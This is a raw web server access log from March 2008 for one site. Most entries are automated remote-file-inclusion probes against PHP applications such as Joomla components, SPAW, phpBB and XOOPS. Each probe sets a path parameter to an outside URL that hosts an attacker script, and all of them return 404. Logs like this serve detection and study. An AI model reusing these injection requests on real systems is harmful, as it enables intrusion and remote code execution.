61.19.30.146 - - [02/Mar/2008:04:15:29 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:04:16:00 -0800] "GET /index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:04:16:00 -0800] "GET /logs/index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:04:16:13 -0800] "GET /logs/index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:04:16:13 -0800] "GET /index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
217.26.54.6 - - [02/Mar/2008:04:16:45 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [02/Mar/2008:04:16:45 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.54.6 - - [02/Mar/2008:04:16:46 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:04:16:47 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:04:16:47 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:04:16:47 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:04:16:47 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:04:16:47 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:04:16:48 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:04:16:50 -0800] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:04:16:51 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:04:16:51 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:04:17:08 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:04:17:08 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:04:17:08 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:04:17:08 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:04:17:09 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:04:17:09 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:10 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:10 -0800] "GET //Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:11 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:22 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:22 -0800] "GET //Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:23 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.189.132 - - [02/Mar/2008:04:17:24 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.mealsvictoria.org.au//wiki/maps/mealsvictoria.org.en/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:25 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:25 -0800] "GET //Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:26 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:42 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:54 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:17:59 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.108.34 - - [02/Mar/2008:04:18:06 -0800] "GET /logs/access_071124.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:04:18:48 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:04:18:48 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:04:18:49 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:04:18:49 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:04:18:49 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.97.181.220 - - [02/Mar/2008:04:18:50 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:19:04 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.geocities.com/devayudistira/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:04:19:05 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:19:05 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/devayudistira/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:04:19:05 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:19:05 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geocities.com/devayudistira/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.156 - - [02/Mar/2008:04:19:28 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.23.153.242 - - [02/Mar/2008:04:19:31 -0800] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://www.geocities.com/devayudistira/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.22.241 - - [02/Mar/2008:04:20:20 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.xdccshare.helloweb.eu/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.220.146.59 - - [02/Mar/2008:04:20:47 -0800] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.220.146.59 - - [02/Mar/2008:04:20:48 -0800] "GET /include/functions_common.php?gl_root_path=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.220.146.59 - - [02/Mar/2008:04:20:48 -0800] "GET /logs/include/functions_common.php?gl_root_path=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:04:20:50 -0800] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:04:20:50 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:04:20:50 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:20:52 -0800] "GET /logs/access_080208.log//components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:20:53 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:20:53 -0800] "GET /logs/access_080208.log/components/com_forum/download.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:20:53 -0800] "GET /components/com_forum/download.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:20:53 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:20:54 -0800] "GET /logs/components/com_forum/download.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
74.6.24.41 - - [02/Mar/2008:04:21:13 -0800] "GET /logs/access_070713.log HTTP/1.0" 200 67092 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:21:37 -0800] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:21:38 -0800] "GET /logs/access_080126.log/components/com_forum/download.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:23:07 -0800] "GET /logs/access_080216.log//admin/oneadmin/newspublish/include.php?path[docroot]=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:23:08 -0800] "GET //admin/oneadmin/newspublish/include.php?path[docroot]=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:23:08 -0800] "GET /logs//admin/oneadmin/newspublish/include.php?path[docroot]=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.176 - - [02/Mar/2008:04:23:38 -0800] "GET /logs/access_080122.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:24:05 -0800] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:24:05 -0800] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:24:05 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:24:05 -0800] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:24:06 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:24:06 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:24:06 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:24:07 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:24:07 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
67.195.58.171 - - [02/Mar/2008:04:24:14 -0800] "GET /logs/access_080119.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:04:24:43 -0800] "GET /logs/access_080215.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:04:24:43 -0800] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:04:24:43 -0800] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:25:44 -0800] "GET /logs/access_080122.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:25:44 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:25:46 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:04:25:55 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:04:26:32 -0800] "GET /logs/access_080216.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:04:26:32 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:04:26:33 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.26.54.6 - - [02/Mar/2008:04:26:58 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:04:32:49 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:04:32:49 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:04:32:49 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:04:32:50 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:04:32:50 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.97.0.11 - - [02/Mar/2008:04:32:50 -0800] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:04:32:53 -0800] "GET /logs/access_080215.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:04:32:53 -0800] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:04:32:53 -0800] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:32:54 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:04:32:55 -0800] "GET /logs/access_080119.log/administrator/components/com_extcalendar/admin_settings.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
221.143.48.95 - - [02/Mar/2008:04:33:05 -0800] "GET /logs/Encoder.php?base_dir=http://www.geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
